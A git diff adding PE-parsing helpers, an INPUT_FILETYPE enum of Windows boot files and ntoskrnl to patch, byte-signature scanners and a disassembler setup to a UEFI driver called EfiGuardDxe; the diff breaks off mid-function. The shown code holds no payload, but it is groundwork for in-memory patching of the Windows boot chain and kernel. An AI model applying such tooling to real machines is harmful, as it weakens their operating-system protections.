+ PIMAGE_THUNK_DATA64 ThunkEntry = (PIMAGE_THUNK_DATA64)ThunkData;
+
+ for (UINT32 j = 0; ThunkEntry->u1.AddressOfData > 0; ++j)
+ {
+ CONST PIMAGE_IMPORT_BY_NAME ImportByName = (PIMAGE_IMPORT_BY_NAME)(
+ (UINTN)ImageBase + ThunkEntry->u1.AddressOfData);
+
+ if ((ThunkEntry->u1.Ordinal & IMAGE_ORDINAL_FLAG64) == 0 && // Ignore imports by ordinal
+ ImportByName->Name[0] != '\0' &&
+ AsciiStriCmp(ImportByName->Name, FunctionName) == 0)
+ {
+ // Found the import
+ CONST UINT32 Rva = Descriptor->FirstThunk + j * sizeof(UINTN);
+ VOID* Va = (VOID*)((UINTN)(ImageBase) + Rva);
+ *FunctionIATAddress = Va;
+ return EFI_SUCCESS;
+ }
+
+ ThunkEntry = (PIMAGE_THUNK_DATA64)((UINTN)ThunkEntry + sizeof(IMAGE_THUNK_DATA64));
+ }
+ }
+ else
+ {
+ PIMAGE_THUNK_DATA32 ThunkEntry = (PIMAGE_THUNK_DATA32)ThunkData;
+
+ for (UINT32 j = 0; ThunkEntry->u1.AddressOfData > 0; ++j)
+ {
+ CONST PIMAGE_IMPORT_BY_NAME ImportByName = (PIMAGE_IMPORT_BY_NAME)(
+ (UINTN)ImageBase + ThunkEntry->u1.AddressOfData);
+
+ if ((ThunkEntry->u1.Ordinal & IMAGE_ORDINAL_FLAG32) == 0 && // Ignore imports by ordinal
+ ImportByName->Name[0] != '\0' &&
+ AsciiStriCmp(ImportByName->Name, FunctionName) == 0)
+ {
+ // Found the import
+ CONST UINT32 Rva = Descriptor->FirstThunk + j * sizeof(UINTN);
+ VOID* Va = (VOID*)((UINTN)ImageBase + Rva);
+ *FunctionIATAddress = Va;
+ return EFI_SUCCESS;
+ }
+
+ ThunkEntry = (PIMAGE_THUNK_DATA32)((UINTN)ThunkEntry + sizeof(IMAGE_THUNK_DATA32));
+ }
+ }
+ }
+ return EFI_NOT_FOUND;
+}
+
+
+UINT32
+EFIAPI
+RvaToOffset(
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders,
+ IN UINT32 Rva
+ )
+{
+ PEFI_IMAGE_SECTION_HEADER SectionHeaders = IMAGE_FIRST_SECTION(NtHeaders);
+ CONST UINT16 NumberOfSections = NtHeaders->FileHeader.NumberOfSections;
+ UINT32 Result = 0;
+ for (UINT16 i = 0; i < NumberOfSections; ++i)
+ {
+ if (SectionHeaders->VirtualAddress <= Rva &&
+ SectionHeaders->VirtualAddress + SectionHeaders->Misc.VirtualSize > Rva)
+ {
+ Result = Rva - SectionHeaders->VirtualAddress +
+ SectionHeaders->PointerToRawData;
+ break;
+ }
+ SectionHeaders++;
+ }
+ return Result;
+}
+
+// The kernel and ntdll divide this into [ RtlImageDirectoryEntryToData -> RtlpImageDirectoryEntryToData ->
+// { RtlpImageDirectoryEntryToData32 / RtlpImageDirectoryEntryToData64 } -> RtlpAddressInSectionTable ->
+// RtlpSectionTableFromVirtualAddress ], but with some macro help and RvaToOffset it can be limited to one function
+VOID*
+EFIAPI
+RtlpImageDirectoryEntryToDataEx(
+ IN VOID* Base,
+ IN BOOLEAN MappedAsImage,
+ IN UINT16 DirectoryEntry,
+ OUT UINT32 *Size
+ )
+{
+ if (LDR_IS_DATAFILE(Base))
+ {
+ Base = LDR_DATAFILE_TO_VIEW(Base);
+ MappedAsImage = FALSE;
+ }
+
+ CONST PEFI_IMAGE_NT_HEADERS NtHeaders = RtlpImageNtHeaderEx(Base, 0);
+ if (NtHeaders == NULL)
+ return NULL;
+
+ if (DirectoryEntry >= HEADER_FIELD(NtHeaders, NumberOfRvaAndSizes))
+ return NULL;
+
+ CONST PEFI_IMAGE_DATA_DIRECTORY Directories = HEADER_FIELD(NtHeaders, DataDirectory);
+ CONST UINT32 Rva = Directories[DirectoryEntry].VirtualAddress;
+ if (Rva == 0)
+ return NULL;
+
+ // Omitted: check for illegal UM <-> KM boundary crossing as it is N/A for us
+
+ *Size = Directories[DirectoryEntry].Size;
+ if (MappedAsImage || Rva < HEADER_FIELD(NtHeaders, SizeOfHeaders))
+ {
+ return (VOID*)((UINT8*)(Base) + Rva);
+ }
+
+ return (VOID*)((UINT8*)(Base) + RvaToOffset(NtHeaders, Rva));
+}
+
+// Similar to LdrFindResource_U + LdrAccessResource combined, with some shortcuts for size optimization:
+// - Only IDs are supported for type/name/language, not strings. Named entries ("MUI", "RCDATA", ...) are ignored.
+// - Only images are supported, not mapped data files (e.g. LoadLibrary(..., LOAD_LIBRARY_AS_DATAFILE) data).
+// - Language ID matching is greatly simplified. Either supply 0 (first entry wins) or an exact match ID. There are no fallbacks for similar languages, user preferences, etc.
+// - The path length is assumed to always be 3: Type -> Name -> Language, with a data entry as leaf node.
+//
+// NB: The output will be a direct pointer to the resource data, which on Windows usually means it is read only, and on UEFI
+// means writing to it is probably not what you want. This is the same behaviour as LdrAccessResource() but easy to forget.
+// If you need to modify the data or unload the original image at some point, copy the data first.
+EFI_STATUS
+EFIAPI
+FindResourceDataById(
+ IN VOID* ImageBase,
+ IN UINT16 TypeId,
+ IN UINT16 NameId,
+ IN UINT16 LanguageId OPTIONAL,
+ OUT VOID** ResourceData OPTIONAL,
+ OUT UINT32* ResourceSize
+ )
+{
+ if (ResourceData != NULL)
+ *ResourceData = NULL;
+ *ResourceSize = 0;
+
+ ASSERT((!LDR_IS_DATAFILE(ImageBase)));
+
+ UINT32 Size = 0;
+ EFI_IMAGE_RESOURCE_DIRECTORY *ResourceDirTable = (EFI_IMAGE_RESOURCE_DIRECTORY*)
+ RtlpImageDirectoryEntryToDataEx(ImageBase,
+ TRUE,
+ EFI_IMAGE_DIRECTORY_ENTRY_RESOURCE,
+ &Size);
+ if (ResourceDirTable == NULL || Size == 0)
+ return EFI_NOT_FOUND;
+
+ CONST UINT8* ResourceDirVa = (UINT8*)ResourceDirTable;
+ EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY *DirEntry = NULL;
+ for (UINT16 i = ResourceDirTable->NumberOfNamedEntries; i < ResourceDirTable->NumberOfNamedEntries + ResourceDirTable->NumberOfIdEntries; ++i)
+ {
+ DirEntry = (EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY*)((UINT8*)ResourceDirTable + sizeof(EFI_IMAGE_RESOURCE_DIRECTORY) + (i * sizeof(EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY)));
+ if ((BOOLEAN)DirEntry->u1.s.NameIsString)
+ continue;
+ if (DirEntry->u1.Id == TypeId && DirEntry->u2.s.DataIsDirectory)
+ break;
+ }
+ if (DirEntry == NULL || DirEntry->u1.Id != TypeId)
+ return EFI_NOT_FOUND;
+
+ ResourceDirTable = (EFI_IMAGE_RESOURCE_DIRECTORY*)(ResourceDirVa + DirEntry->u2.s.OffsetToDirectory);
+ DirEntry = NULL;
+ for (UINT16 i = ResourceDirTable->NumberOfNamedEntries; i < ResourceDirTable->NumberOfNamedEntries + ResourceDirTable->NumberOfIdEntries; ++i)
+ {
+ DirEntry = (EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY*)((UINT8*)ResourceDirTable + sizeof(EFI_IMAGE_RESOURCE_DIRECTORY) + (i * sizeof(EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY)));
+ if ((BOOLEAN)DirEntry->u1.s.NameIsString)
+ continue;
+ if (DirEntry->u1.Id == NameId && DirEntry->u2.s.DataIsDirectory)
+ break;
+ }
+ if (DirEntry == NULL || DirEntry->u1.Id != NameId)
+ return EFI_NOT_FOUND;
+
+ ResourceDirTable = (EFI_IMAGE_RESOURCE_DIRECTORY*)(ResourceDirVa + DirEntry->u2.s.OffsetToDirectory);
+ DirEntry = NULL;
+ for (UINT16 i = ResourceDirTable->NumberOfNamedEntries; i < ResourceDirTable->NumberOfNamedEntries + ResourceDirTable->NumberOfIdEntries; ++i)
+ {
+ DirEntry = (EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY*)((UINT8*)ResourceDirTable + sizeof(EFI_IMAGE_RESOURCE_DIRECTORY) + (i * sizeof(EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY)));
+ if ((BOOLEAN)DirEntry->u1.s.NameIsString)
+ continue;
+ if ((LanguageId == 0 || DirEntry->u1.Id == LanguageId) && !DirEntry->u2.s.DataIsDirectory)
+ break;
+ }
+ if (DirEntry == NULL || (LanguageId != 0 && DirEntry->u1.Id != LanguageId))
+ return EFI_INVALID_LANGUAGE;
+
+ EFI_IMAGE_RESOURCE_DATA_ENTRY *DataEntry = (EFI_IMAGE_RESOURCE_DATA_ENTRY*)(ResourceDirVa + DirEntry->u2.OffsetToData);
+ if (ResourceData != NULL)
+ *ResourceData = (VOID*)((UINT8*)ImageBase + DataEntry->OffsetToData);
+ *ResourceSize = DataEntry->Size;
+
+ return EFI_SUCCESS;
+}
+
+EFI_STATUS
+EFIAPI
+GetPeFileVersionInfo(
+ IN VOID* ImageBase,
+ OUT UINT16* MajorVersion OPTIONAL,
+ OUT UINT16* MinorVersion OPTIONAL,
+ OUT UINT16* BuildNumber OPTIONAL,
+ OUT UINT16* Revision OPTIONAL,
+ OUT UINT32* FileFlags OPTIONAL
+ )
+{
+ // Search the PE file's resource directory (if it exists) for a version info entry
+ VS_VERSIONINFO *VersionResource;
+ UINT32 VersionResourceSize;
+ CONST EFI_STATUS Status = FindResourceDataById(ImageBase,
+ RT_VERSION,
+ VS_VERSION_INFO,
+ MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL),
+ (VOID**)&VersionResource,
+ &VersionResourceSize);
+ if (EFI_ERROR(Status))
+ {
+ DEBUG((DEBUG_ERROR, "GetPeFileVersionInfo: FindResourceDataById returned %llx\r\n", Status));
+ return Status; // Either no resource directory or no version info. Perhaps ASSERT() here as the files we patch should always have them
+ }
+
+ if (VersionResourceSize < sizeof(VS_VERSIONINFO) ||
+ StrnCmp(VersionResource->Name, L"VS_VERSION_INFO", (sizeof(L"VS_VERSION_INFO") / sizeof(CHAR16)) - 1) != 0 ||
+ VersionResource->FixedFileInfo.dwSignature != 0xFEEF04BD)
+ {
+ DEBUG((DEBUG_ERROR, "GetPeFileVersionInfo: RESOURCE_VERSION_DATA at 0x%p is not valid\r\n", (VOID*)VersionResource));
+ return EFI_NOT_FOUND;
+ }
+
+ if (MajorVersion != NULL)
+ *MajorVersion = HIWORD(VersionResource->FixedFileInfo.dwFileVersionMS);
+ if (MinorVersion != NULL)
+ *MinorVersion = LOWORD(VersionResource->FixedFileInfo.dwFileVersionMS);
+ if (BuildNumber != NULL)
+ *BuildNumber = HIWORD(VersionResource->FixedFileInfo.dwFileVersionLS);
+ if (Revision != NULL)
+ *Revision = LOWORD(VersionResource->FixedFileInfo.dwFileVersionLS);
+ if (FileFlags != NULL)
+ *FileFlags = (VersionResource->FixedFileInfo.dwFileFlags & VersionResource->FixedFileInfo.dwFileFlagsMask);
+
+ return EFI_SUCCESS;
+}
diff --git a/EfiGuardDxe/pe.h b/EfiGuardDxe/pe.h
new file mode 100644
index 0000000..8c5f41c
--- /dev/null
+++ b/EfiGuardDxe/pe.h
@@ -0,0 +1,252 @@
+#pragma once
+
+#include <IndustryStandard/PeImage.h>
+
+
+//
+// Typedefs
+//
+typedef EFI_IMAGE_NT_HEADERS32 *PEFI_IMAGE_NT_HEADERS32;
+typedef EFI_IMAGE_NT_HEADERS64 *PEFI_IMAGE_NT_HEADERS64;
+
+#if defined(MDE_CPU_X64)
+typedef EFI_IMAGE_NT_HEADERS64 EFI_IMAGE_NT_HEADERS, *PEFI_IMAGE_NT_HEADERS;
+#elif defined(MDE_CPU_IA32)
+typedef EFI_IMAGE_NT_HEADERS32 EFI_IMAGE_NT_HEADERS, *PEFI_IMAGE_NT_HEADERS;
+#endif
+
+typedef EFI_IMAGE_DOS_HEADER *PEFI_IMAGE_DOS_HEADER;
+typedef EFI_IMAGE_FILE_HEADER *PEFI_IMAGE_FILE_HEADER;
+typedef EFI_IMAGE_SECTION_HEADER *PEFI_IMAGE_SECTION_HEADER;
+typedef EFI_IMAGE_DATA_DIRECTORY *PEFI_IMAGE_DATA_DIRECTORY;
+typedef EFI_IMAGE_EXPORT_DIRECTORY *PEFI_IMAGE_EXPORT_DIRECTORY;
+
+// ACHTUNG: DO NOT USE - EDK2 people didn't read the PE docs re: these it seems. Not very surprising since EFI files don't tend to use imports
+//typedef EFI_IMAGE_IMPORT_BY_NAME *PEFI_IMAGE_IMPORT_BY_NAME;
+//typedef EFI_IMAGE_THUNK_DATA *PEFI_IMAGE_THUNK_DATA;
+//typedef EFI_IMAGE_IMPORT_DESCRIPTOR *PEFI_IMAGE_IMPORT_DESCRIPTOR;
+
+
+//
+// Defines
+//
+#define EFI_IMAGE_SUBSYSTEM_NATIVE 1
+#define EFI_IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION 16
+
+#define IMAGE_ORDINAL_FLAG64 (0x8000000000000000)
+#define IMAGE_ORDINAL_FLAG32 (0x80000000)
+
+#define RT_VERSION 16
+#define VS_VERSION_INFO 1
+#define VS_FF_DEBUG (0x00000001L)
+
+#define IMAGE32(NtHeaders) ((NtHeaders)->OptionalHeader.Magic == EFI_IMAGE_NT_OPTIONAL_HDR32_MAGIC)
+#define IMAGE64(NtHeaders) ((NtHeaders)->OptionalHeader.Magic == EFI_IMAGE_NT_OPTIONAL_HDR64_MAGIC)
+
+#define HEADER_FIELD(NtHeaders, Field) (IMAGE64(NtHeaders) \
+ ? ((PEFI_IMAGE_NT_HEADERS64)(NtHeaders))->OptionalHeader.Field \
+ : ((PEFI_IMAGE_NT_HEADERS32)(NtHeaders))->OptionalHeader.Field)
+
+#define IMAGE_FIRST_SECTION(NtHeaders) ((PEFI_IMAGE_SECTION_HEADER) \
+ ((UINTN)(NtHeaders) + \
+ FIELD_OFFSET(EFI_IMAGE_NT_HEADERS, OptionalHeader) + \
+ ((NtHeaders))->FileHeader.SizeOfOptionalHeader))
+
+
+//
+// Type of file to patch
+//
+typedef enum _INPUT_FILETYPE
+{
+ Unknown,
+
+ // BIOS boot manager/loader
+ Bootmgr, // Unsupported
+ WinloadExe, // Unsupported
+
+ // EFI boot manager/loader
+ BootmgfwEfi,
+ BootmgrEfi,
+ WinloadEfi,
+
+ // Kernel
+ Ntoskrnl
+} INPUT_FILETYPE;
+
+
+//
+// Define (correct) import descriptor types and use their standard NT names because the EFI prefixed ones are taken
+//
+
+#pragma pack(push, 4) // Use 4 byte packing
+
+typedef struct _IMAGE_IMPORT_BY_NAME
+{
+ UINT16 Hint;
+ CHAR8 Name[1];
+} IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME;
+
+#pragma pack(pop)
+
+#pragma pack(push, 8) // 8 byte alignment for the 64 bit IAT
+
+typedef struct _IMAGE_THUNK_DATA64
+{
+ union
+ {
+ UINT64 ForwarderString; // UINT8*
+ UINT64 Function; // UINT32*
+ UINT64 Ordinal;
+ UINT64 AddressOfData; // PIMAGE_IMPORT_BY_NAME
+ } u1;
+} IMAGE_THUNK_DATA64, *PIMAGE_THUNK_DATA64;
+
+#pragma pack(pop)
+
+#pragma pack(push, 4) // Revert to 4 byte packing
+
+typedef struct _IMAGE_THUNK_DATA32
+{
+ union
+ {
+ UINT32 ForwarderString; // UINT8*
+ UINT32 Function; // UINT32*
+ UINT32 Ordinal;
+ UINT32 AddressOfData; // PIMAGE_IMPORT_BY_NAME
+ } u1;
+} IMAGE_THUNK_DATA32, *PIMAGE_THUNK_DATA32;
+
+typedef struct _IMAGE_IMPORT_DESCRIPTOR
+{
+ union
+ {
+ UINT32 Characteristics; // 0 for terminating null import descriptor
+ UINT32 OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA)
+ } u;
+ UINT32 TimeDateStamp; // 0 if not bound,
+ // -1 if bound, and real date\time stamp
+ // in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND)
+ // O.W. date/time stamp of DLL bound to (Old BIND)
+
+ UINT32 ForwarderChain; // -1 if no forwarders
+ UINT32 Name;
+ UINT32 FirstThunk; // RVA to IAT (if bound this IAT has actual addresses)
+} IMAGE_IMPORT_DESCRIPTOR, *PIMAGE_IMPORT_DESCRIPTOR;
+
+#pragma pack(pop) // Revert to original packing
+
+
+//
+// Version info data
+//
+typedef struct _VS_FIXEDFILEINFO
+{
+ UINT32 dwSignature; // 0xFEEF04BD
+ UINT32 dwStrucVersion;
+ UINT32 dwFileVersionMS;
+ UINT32 dwFileVersionLS;
+ UINT32 dwProductVersionMS;
+ UINT32 dwProductVersionLS;
+ UINT32 dwFileFlagsMask;
+ UINT32 dwFileFlags;
+ UINT32 dwFileOS;
+ UINT32 dwFileType;
+ UINT32 dwFileSubtype;
+ UINT32 dwFileDateMS;
+ UINT32 dwFileDateLS;
+} VS_FIXEDFILEINFO;
+
+//
+// Raw version info data as it appears in a PE file resource directory
+// This struct is not in any SDK headers, not because it is super secret, but because MS
+// is ashamed of it: https://docs.microsoft.com/en-gb/windows/desktop/menurc/vs-versioninfo
+//
+typedef struct _VS_VERSIONINFO
+{
+ UINT16 TotalSize;
+ UINT16 DataSize;
+ UINT16 Type;
+ CHAR16 Name[sizeof(L"VS_VERSION_INFO") / sizeof(CHAR16)]; // Size includes null terminator
+ VS_FIXEDFILEINFO FixedFileInfo;
+ // Omitted: padding fields that do not contribute to TotalSize
+} VS_VERSIONINFO, *PVS_VERSIONINFO;
+
+
+//
+// Function declarations
+//
+PEFI_IMAGE_NT_HEADERS
+EFIAPI
+RtlpImageNtHeaderEx(
+ IN VOID* Base,
+ IN UINTN Size OPTIONAL
+ );
+
+INPUT_FILETYPE
+EFIAPI
+GetInputFileType(
+ IN UINT8 *ImageBase,
+ IN UINTN ImageSize
+ );
+
+CONST CHAR16*
+EFIAPI
+FileTypeToString(
+ IN INPUT_FILETYPE FileType
+ );
+
+VOID*
+EFIAPI
+GetProcedureAddress(
+ IN UINTN DllBase,
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders,
+ IN CHAR8* RoutineName
+ );
+
+EFI_STATUS
+EFIAPI
+FindIATAddressForImport(
+ IN VOID* ImageBase,
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders,
+ IN CONST CHAR8* ImportDllName,
+ IN CONST CHAR8* FunctionName,
+ OUT VOID **FunctionIATAddress
+ );
+
+UINT32
+EFIAPI
+RvaToOffset(
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders,
+ IN UINT32 Rva
+ );
+
+VOID*
+EFIAPI
+RtlpImageDirectoryEntryToDataEx(
+ IN VOID* Base,
+ IN BOOLEAN MappedAsImage,
+ IN UINT16 DirectoryEntry,
+ OUT UINT32 *Size
+ );
+
+EFI_STATUS
+EFIAPI
+FindResourceDataById(
+ IN VOID* ImageBase,
+ IN UINT16 TypeId,
+ IN UINT16 NameId,
+ IN UINT16 LanguageId OPTIONAL,
+ OUT VOID** ResourceData OPTIONAL,
+ OUT UINT32* ResourceSize
+ );
+
+EFI_STATUS
+EFIAPI
+GetPeFileVersionInfo(
+ IN VOID* ImageBase,
+ OUT UINT16* MajorVersion OPTIONAL,
+ OUT UINT16* MinorVersion OPTIONAL,
+ OUT UINT16* BuildNumber OPTIONAL,
+ OUT UINT16* Revision OPTIONAL,
+ OUT UINT32* FileFlags OPTIONAL
+ );
diff --git a/EfiGuardDxe/util.c b/EfiGuardDxe/util.c
new file mode 100644
index 0000000..861c81d
--- /dev/null
+++ b/EfiGuardDxe/util.c
@@ -0,0 +1,380 @@
+#include "EfiGuardDxe.h"
+#include "util.h"
+
+#include <Library/UefiLib.h>
+#include <Library/DevicePathLib.h>
+#include <Library/PrintLib.h>
+#include <Library/UefiBootServicesTableLib.h>
+
+#ifndef ZYDIS_DISABLE_FORMATTER
+
+#include <Library/PrintLib.h>
+#include <Zycore/Format.h>
+
+STATIC ZydisFormatterFunc DefaultInstructionFormatter;
+
+#endif
+
+//
+// When debugging, we can choose between poor debugging facilities (VirtualBox) or poor performance and Windows compatibility (QEMU).
+// (I guess there is also the closed source thing with the horrible user interface that installs 50 drivers on the host (VMware))
+// This is a bandaid to make Print() calls readable ...for a while... when using VirtualBox or a live machine with no debugger
+//
+EFI_STATUS
+EFIAPI
+RtlSleep(
+ IN UINTN Milliseconds
+ )
+{
+ ASSERT(gBS != NULL);
+ ASSERT(gBS->Stall != NULL);
+
+ return gBS->Stall(Milliseconds * 1000);
+}
+
+VOID
+EFIAPI
+PrintLoadedImageInfo(
+ IN EFI_LOADED_IMAGE *ImageInfo
+ )
+{
+ CHAR16* PathString = ConvertDevicePathToText(ImageInfo->FilePath, TRUE, TRUE);
+ Print(L"\r\n[+] %s\r\n", PathString);
+ Print(L" -> ImageBase = %llx\r\n", ImageInfo->ImageBase);
+ Print(L" -> ImageSize = %llx\r\n", ImageInfo->ImageSize);
+ if (PathString != NULL)
+ FreePool(PathString);
+}
+
+VOID
+EFIAPI
+AppendKernelPatchMessage(
+ IN CONST CHAR16 *Format,
+ ...
+ )
+{
+ ASSERT(gKernelPatchInfo.BufferSize % sizeof(CHAR16) == 0);
+ ASSERT(gKernelPatchInfo.BufferSize < sizeof(gKernelPatchInfo.Buffer));
+
+ VA_LIST VaList;
+ VA_START(VaList, Format);
+ CONST UINTN NumCharsPrinted = UnicodeVSPrint(gKernelPatchInfo.Buffer + (gKernelPatchInfo.BufferSize / sizeof(CHAR16)),
+ sizeof(gKernelPatchInfo.Buffer) - gKernelPatchInfo.BufferSize,
+ Format,
+ VaList);
+ VA_END(VaList);
+
+ ASSERT(gKernelPatchInfo.BufferSize + (NumCharsPrinted * sizeof(CHAR16)) < sizeof(gKernelPatchInfo.Buffer));
+ gKernelPatchInfo.BufferSize += (NumCharsPrinted * sizeof(CHAR16));
+
+ // Paranoid null terminator (UnicodeVSPrint should do this)
+ *(CHAR16*)(gKernelPatchInfo.Buffer + (gKernelPatchInfo.BufferSize / sizeof(CHAR16))) = CHAR_NULL;
+
+ // Separate the next message using the null terminator. This is because most Print() implementations crap out
+ // after ~4 lines (depending on PCDs), so we will print the final buffer using multiple calls to Print()
+ gKernelPatchInfo.BufferSize += sizeof(CHAR16);
+}
+
+VOID
+EFIAPI
+PrintKernelPatchInfo(
+ )
+{
+ ASSERT(gST->ConOut != NULL);
+
+ UINTN NumChars = gKernelPatchInfo.BufferSize / sizeof(CHAR16);
+ if (NumChars * sizeof(CHAR16) >= sizeof(gKernelPatchInfo.Buffer) - sizeof(CHAR16))
+ NumChars = sizeof(gKernelPatchInfo.Buffer) - (2 * sizeof(CHAR16)); // Avoid buffer overrun
+
+ CHAR16* String = gKernelPatchInfo.Buffer;
+ String[NumChars] = String[NumChars + 1] = CHAR_NULL; // Ensure we have a double null terminator at the end
+ UINTN Length;
+
+ // A double null terminator marks the end. It's just like that lovely Win32 getenv API that makes me want to kill myself every time I see it
+ while ((Length = StrLen(String)) != 0)
+ {
+ gST->ConOut->OutputString(gST->ConOut, String);
+ String += Length + 1;
+ }
+}
+
+BOOLEAN
+EFIAPI
+WaitForKey(
+ )
+{
+ // Hack: because we call this at TPL_NOTIFY in ExitBootServices, we cannot use WaitForEvent()
+ // in that scenario because it requires TPL == TPL_APPLICATION. So check the TPL
+ CONST EFI_TPL Tpl = EfiGetCurrentTpl();
+
+ EFI_INPUT_KEY Key = { 0, 0 };
+ EFI_STATUS Status = EFI_NOT_READY;
+
+ while (Status == EFI_NOT_READY)
+ {
+ // Can we call WaitForEvent()?
+ UINTN Index = 0;
+ if (Tpl == TPL_APPLICATION)
+ gBS->WaitForEvent(1, &gST->ConIn->WaitForKey, &Index); // Yep
+ else
+ RtlSleep(1); // Nope; burn CPU. // TODO: find a way to parallelize this to achieve GeForce FX 5800 temperatures
+
+ // At TPL_APPLICATION, we will always get EFI_SUCCESS (barring hardware failures). At higher TPLs we may also get EFI_NOT_READY
+ Status = gST->ConIn->ReadKeyStroke(gST->ConIn, &Key);
+ }
+
+ ASSERT_EFI_ERROR(Status);
+ return (BOOLEAN)(Key.ScanCode != SCAN_ESC);
+}
+
+INT32
+EFIAPI
+SetConsoleTextColour(
+ IN UINTN TextColour,
+ IN BOOLEAN ClearScreen
+ )
+{
+ CONST INT32 OriginalAttribute = gST->ConOut->Mode->Attribute;
+ CONST UINTN BackgroundColour = (UINTN)((OriginalAttribute >> 4) & 0x7);
+
+ gST->ConOut->SetAttribute(gST->ConOut, (TextColour | BackgroundColour));
+ if (ClearScreen)
+ gST->ConOut->ClearScreen(gST->ConOut);
+
+ return OriginalAttribute;
+}
+
+// TODO: #ifdef EFI_DEBUG, this should keep a match count and continue until the end of the buffer, then ASSERT(MatchCount == 1)
+EFI_STATUS
+EFIAPI
+FindPattern(
+ IN CONST UINT8* Pattern,
+ IN UINT8 Wildcard,
+ IN UINT32 PatternLength,
+ IN VOID* Base,
+ IN UINT32 Size,
+ OUT VOID **Found
+ )
+{
+ if (Found == NULL || Pattern == NULL || Base == NULL)
+ return EFI_INVALID_PARAMETER;
+
+ *Found = NULL;
+
+ for (UINT8 *Address = (UINT8*)Base; Address < (UINT8*)((UINTN)Base + Size - PatternLength); ++Address)
+ {
+ UINT32 i;
+ for (i = 0; i < PatternLength; ++i)
+ {
+ if (Pattern[i] != Wildcard && (*(Address + i) != Pattern[i]))
+ break;
+ }
+
+ if (i == PatternLength)
+ {
+ *Found = (VOID*)Address;
+ return EFI_SUCCESS;
+ }
+ }
+
+ return EFI_NOT_FOUND;
+}
+
+// For debugging non-working signatures. Not that I would ever need to do such a thing of course. Ha ha... ha
+// TODO: #ifdef EFI_DEBUG, this should keep a match count and continue until the end of the buffer, then ASSERT(MatchCount == 1)
+EFI_STATUS
+EFIAPI
+FindPatternVerbose(
+ IN CONST UINT8* Pattern,
+ IN UINT8 Wildcard,
+ IN UINT32 PatternLength,
+ IN VOID* Base,
+ IN UINT32 Size,
+ OUT VOID **Found
+ )
+{
+ if (Found == NULL || Pattern == NULL || Base == NULL)
+ return EFI_INVALID_PARAMETER;
+
+ *Found = NULL;
+
+ CONST UINTN Start = (UINTN)Base;
+ CONST UINTN End = Start + Size - PatternLength;
+ EFI_STATUS Status = EFI_NOT_FOUND;
+
+ UINT32 Max = 0;
+ UINT8 *AddrOfMax = NULL;
+
+ for (UINT8 *Address = (UINT8*)Start; Address < (UINT8*)End; ++Address)
+ {
+ UINT32 i;
+ for (i = 0; i < PatternLength; ++i)
+ {
+ if (Pattern[i] != Wildcard && (*(Address + i) != Pattern[i]))
+ break;
+ }
+
+ if (i > Max)
+ {
+ Max = i;
+ AddrOfMax = Address;
+ }
+
+ if (i == PatternLength)
+ {
+ *Found = (VOID*)Address;
+ Status = EFI_SUCCESS;
+ }
+ }
+
+ Print(L"\r\nBest match: %lu/%lu matched at 0x%p\r\n", Max, PatternLength, (VOID*)AddrOfMax);
+
+ for (UINT32 i = 0; i < PatternLength && AddrOfMax != NULL; ++i)
+ {
+ if (Pattern[i] != Wildcard && (*(AddrOfMax + i) != Pattern[i]))
+ Print(L"[%lu] [X] %02X != %02X\r\n", i, (*(AddrOfMax + i)), Pattern[i]); // Mismatch
+ else if (Pattern[i] == Wildcard)
+ Print(L"[%lu] [ ] %02X\r\n", i, (*(AddrOfMax + i))); // Matched wildcard byte
+ else
+ Print(L"[%lu] [v] %02X\r\n", i, Pattern[i]); // Matched exact byte
+ }
+
+ return Status;
+}
+
+#ifndef ZYDIS_DISABLE_FORMATTER
+
+// Formatter hook to prefix the opcode bytes to the output
+STATIC
+ZyanStatus
+ZydisInstructionBytesFormatter(
+ IN CONST ZydisFormatter* Formatter,
+ IN OUT ZydisFormatterBuffer* Buffer,
+ IN ZydisFormatterContext* Context
+ )
+{
+ CONST ZyanU8 MaxOpcodeBytes = 12; // Print at most 10 bytes (so 20 characters), with room for ellip.. ses
+
+ ZyanString *String;
+ ZYAN_CHECK(ZydisFormatterBufferGetString(Buffer, &String));
+
+ // We cannot use ZyanStringAppendFormat() because at the moment it may use dynamic memory allocation
+ // to resize the string buffer, with no way to disable this behaviour. Therefore call AsciiSPrint
+ for (ZyanU8 i = 0; i < MaxOpcodeBytes; ++i)
+ {
+ CONST ZyanUSize Length = String->vector.size;
+ UINTN N;
+
+ if (i < Context->instruction->length && i < MaxOpcodeBytes - 2)
+ {
+ // Print one byte of the instruction
+ N = AsciiSPrint((CHAR8*)(String->vector.data) + Length - 1,
+ String->vector.capacity - Length + 1,
+ "%02X",
+ *(UINT8*)(Context->runtime_address + i));
+ }
+ else if (i < Context->instruction->length && i == MaxOpcodeBytes - 2)
+ {
+ // This is a huge instruction; truncate remaining bytes with ellipses
+ N = AsciiSPrint((CHAR8*)(String->vector.data) + Length - 1,
+ String->vector.capacity - Length + 1,
+ "%a",
+ ".. ");
+ }
+ else
+ {
+ // Print an empty string for alignment padding
+ N = AsciiSPrint((CHAR8*)(String->vector.data) + Length - 1,
+ String->vector.capacity - Length + 1,
+ "%a",
+ " ");
+ }
+
+ // Do bounds check. According to docs, an ASSERT() should have already happened
+ // if we went OOB, but debug asserts may be disabled on this platform
+ if ((INTN)N < 0 || N > (UINTN)(String->vector.capacity - Length))
+ return ZYAN_STATUS_FAILED;
+
+ String->vector.size += (ZyanUSize)N;
+ }
+
+ // Call the default formatter to print the actual instruction text
+ return DefaultInstructionFormatter(Formatter, Buffer, Context);
+}
+
+#endif
+
+ZyanStatus
+EFIAPI
+ZydisInit(
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders,
+ OUT ZydisDecoder *Decoder,
+ OUT ZydisFormatter *Formatter OPTIONAL
+ )
+{
+ ZyanStatus Status;
+ if (!ZYAN_SUCCESS((Status = ZydisDecoderInit(Decoder,
